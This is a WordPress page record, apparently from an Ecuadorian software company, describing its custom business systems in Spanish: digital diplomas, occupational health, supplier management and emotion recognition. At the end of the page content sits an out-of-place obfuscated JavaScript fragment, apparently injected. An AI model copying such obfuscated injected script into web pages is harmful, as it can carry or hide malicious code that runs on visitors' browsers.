{"id":58,"date":"2023-05-24T10:40:20","date_gmt":"2023-05-24T15:40:20","guid":{"rendered":"https:\/\/cyssaambato.net\/?page_id=58"},"modified":"2023-06-21T11:03:55","modified_gmt":"2023-06-21T16:03:55","slug":"productos","status":"publish","type":"page","link":"https:\/\/cyssaambato.net\/index.php\/productos\/","title":{"rendered":"Productos de Software"},"content":{"rendered":"\n<p>Desarrollamos software a medida orientado a la automatizaci\u00f3n de procesos operativos empresariales. A continuaci\u00f3n, varios de nuestros productos desarrollados y que est\u00e1n a su disposici\u00f3n:<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"691\" src=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-21-at-10.02.11-1024x691.jpeg\" alt=\"\" class=\"wp-image-167 size-full\" srcset=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-21-at-10.02.11-1024x691.jpeg 1024w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-21-at-10.02.11-300x203.jpeg 300w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-21-at-10.02.11-768x518.jpeg 768w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-21-at-10.02.11.jpeg 1031w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure><div class=\"wp-block-media-text__content\">\n<p><strong>Sistema para la gesti\u00f3n de diplomas digitales<\/strong><\/p>\n\n\n\n<p align=\"justify\">El sistema permite la f\u00e1cil gesti\u00f3n de la emisi\u00f3n de diplomas digitales de procesos de capacitaci\u00f3n, en las cuales, se tengan muchos alumnos. El software permite subir la plantilla gr\u00e1fica del diploma de acuerdo a cada curso, se registran tambi\u00e9n los docentes del respectivo curso, se ingresan como datos las fechas del curso, la duraci\u00f3n del mismo y el t\u00edtulo del curso. Con esa informaci\u00f3n, se generan autom\u00e1ticamente los diplomas digitales. El usuario puede consultar sus diplomas y descargar autom\u00e1ticamente v\u00eda web, esto posibilita que los usuarios de la instituci\u00f3n educativa se eviten de ir personalmente a sus oficinas y puedan disponer de su diploma el momento que deseen independientemente del sitio donde se encuentren. El sistema incorpora como elemento de seguridad un c\u00f3digo QR \u00fanico. <\/p>\n\n\n\n<p align=\"justify\">Para una instituci\u00f3n educativa que invierta en el sistema la recuperaci\u00f3n de dicha inversi\u00f3n es sumamente f\u00e1cil debido al ahorro en: impresiones f\u00edsicas, correcciones, trabajo del personal y env\u00edo de diplomas. Se cuenta tambi\u00e9n con una versi\u00f3n del software espec\u00edficamente para congresos.<\/p>\n<\/div><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"452\" src=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/image_2023-06-21_100531661-1024x452.png\" alt=\"\" class=\"wp-image-171 size-full\" srcset=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/image_2023-06-21_100531661-1024x452.png 1024w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/image_2023-06-21_100531661-300x133.png 300w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/image_2023-06-21_100531661-768x339.png 768w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/image_2023-06-21_100531661-1536x679.png 1536w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/image_2023-06-21_100531661.png 1867w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure><div class=\"wp-block-media-text__content\">\n<p><strong>Sistema de gesti\u00f3n para la evaluaci\u00f3n de la salud ocupacional del talento humano de una empresa<\/strong><\/p>\n\n\n\n<p align=\"justify\">La salud ocupacional es la actividad que est\u00e1 enfocada en promover y mantener el mejor estado de salud f\u00edsico, mental y social en los trabajadores de las diversas entidades ya sean p\u00fablicas o privadas, identificar los diversos factores de riesgos ya sea mec\u00e1nicos, f\u00edsicos, qu\u00edmicos o psicosociales(estr\u00e9s) que pueden aparecer en los puestos de trabajo, es as\u00ed que la salud ocupacional tambi\u00e9n est\u00e1 dirigida a mantener ambientes de trabajo saludables y seguros, uno de los pilares de la salud ocupacional es mantener una salud mental desarrollando al individuo capacidades para afrontar los problemas cotidianos de la vida diaria y poder hacer contribuciones a la comunidad;  pues su capacidad y su salud mental ayudan a mejorar el rendimiento laboral. (Carrasco, E; Rodr\u00edguez,, J, Junio 2019).<\/p>\n<\/div><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"506\" src=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/image_2023-06-21_100757657-1024x506.png\" alt=\"\" class=\"wp-image-172 size-full\" srcset=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/image_2023-06-21_100757657-1024x506.png 1024w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/image_2023-06-21_100757657-300x148.png 300w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/image_2023-06-21_100757657-768x379.png 768w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/image_2023-06-21_100757657-1536x759.png 1536w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/image_2023-06-21_100757657.png 1865w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure><div class=\"wp-block-media-text__content\">\n<p><strong>Sistema para la gesti\u00f3n de proveedores de una empresa<\/strong><\/p>\n\n\n\n<p align=\"justify\">La gesti\u00f3n de proveedores de una empresa es una actividad muy importante pero que en la mayor\u00eda de ellas se la realiza de forma manual, el sistema permite la digitalizaci\u00f3n de dicha gesti\u00f3n y desarrolla de manera autom\u00e1tica diversas actividades como: registro y afiliaci\u00f3n de proveedores, canalizaci\u00f3n de requerimientos de productos, invitaci\u00f3n de convocatorias de requerimientos y registro del proveedor seleccionado para la dotaci\u00f3n de productos. Se puede tambi\u00e9n emitir una calificaci\u00f3n de proveedor especialmente cuando este haya incumplido procesos. Los proveedores pueden ser locales o nacionales.<\/p>\n\n\n\n<p align=\"justify\">Se puede hacer una f\u00e1cil recuperaci\u00f3n de la inversi\u00f3n en el sistema en base a una cuota de inscripci\u00f3n anual por proveedor.<\/p>\n<\/div><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"450\" src=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/operations-management-2021.jpg\" alt=\"\" class=\"wp-image-204 size-full\" srcset=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/operations-management-2021.jpg 800w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/operations-management-2021-300x169.jpg 300w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/operations-management-2021-768x432.jpg 768w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/figure><div class=\"wp-block-media-text__content\">\n<p><strong>Sistema de gesti\u00f3n para los procesos operativos de los departamentos de bienes universitarios<\/strong><\/p>\n\n\n\n<p align=\"justify\">Los procesos operativos universitarios frecuentemente son gestionados por el departamento de bienes, dicha gesti\u00f3n esencialmente involucra la recepci\u00f3n de requerimientos de todos los estamentos universitarios, as\u00ed como, la compra de los insumos y la posterior entrega de los mismos a cada unidad institucional. Esto implica la automatizaci\u00f3n de: requerimientos, recepci\u00f3n de facturas, registro de entrega de productos, control de inventarios y valoraciones relacionadas con el POA institucional.<\/p>\n<\/div><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/concepto-collage-reconocimiento-facial-1024x576.jpg\" alt=\"\" class=\"wp-image-195 size-thumbnail\" srcset=\"https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/concepto-collage-reconocimiento-facial-1024x576.jpg 1024w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/concepto-collage-reconocimiento-facial-300x169.jpg 300w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/concepto-collage-reconocimiento-facial-768x432.jpg 768w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/concepto-collage-reconocimiento-facial-1536x864.jpg 1536w, https:\/\/cyssaambato.net\/wp-content\/uploads\/2023\/06\/concepto-collage-reconocimiento-facial-2048x1152.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure><div class=\"wp-block-media-text__content\">\n<p><strong>Aplicaci\u00f3n web de reconocimiento facial de emociones<\/strong><\/p>\n\n\n\n<p align=\"justify\">Seg\u00fan (Knvul, 2017), el reconocimiento facial es una tecnolog\u00eda que recientemente ha sido cubierta por m\u00faltiples campos de investigaci\u00f3n, como el an\u00e1lisis de im\u00e1genes, la extracci\u00f3n de caracter\u00edsticas de archivos digitales, etc. Esto se debe a que este proceso tecnol\u00f3gico puede simular la capacidad de los humanos para reconocer a las personas de acuerdo con patrones espec\u00edficos en nuestro cerebro. Este proceso es una aplicaci\u00f3n directa de la inteligencia artificial.<\/p>\n\n\n\n<p align=\"justify\">El reconocimiento de emociones faciales es entendido como el proceso por el cual se perciben y analizan los rasgos faciales para la identificaci\u00f3n del estado emocional que los mismos denotan. El mismo aporta informaci\u00f3n adicional para la interpretaci\u00f3n de los mensajes y las acciones de los dem\u00e1s, desempe\u00f1ando un papel central en la regulaci\u00f3n de la conducta social como componente de la interacci\u00f3n interpersonal. (La computaci\u00f3n afectiva y su influencia en las interfaces de reconocimiento facial, 2018).<\/p>\n<\/div><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"><\/figure><div class=\"wp-block-media-text__content\">\n<p><strong>Aplicaci\u00f3n m\u00f3vil inteligente para la gesti\u00f3n nutricional individual<\/strong><\/p>\n<\/div><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script>","protected":false},"excerpt":{"rendered":"<p>Desarrollamos software a medida orientado a la automatizaci\u00f3n de procesos operativos empresariales. A continuaci\u00f3n, varios de nuestros productos desarrollados y que est\u00e1n a su disposici\u00f3n: Sistema para la gesti\u00f3n de diplomas digitales El sistema permite la f\u00e1cil gesti\u00f3n de la emisi\u00f3n de diplomas digitales de procesos de capacitaci\u00f3n, en las cuales, se tengan muchos alumnos. El software permite subir la plantilla gr\u00e1fica del diploma de acuerdo a cada curso, se registran tambi\u00e9n los docentes del respectivo curso, se ingresan como datos las fechas del curso, la duraci\u00f3n del mismo y el t\u00edtulo del curso. Con esa informaci\u00f3n, se generan autom\u00e1ticamente [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-58","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages\/58","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/comments?post=58"}],"version-history":[{"count":24,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages\/58\/revisions"}],"predecessor-version":[{"id":206,"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/pages\/58\/revisions\/206"}],"wp:attachment":[{"href":"https:\/\/cyssaambato.net\/index.php\/wp-json\/wp\/v2\/media?parent=58"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}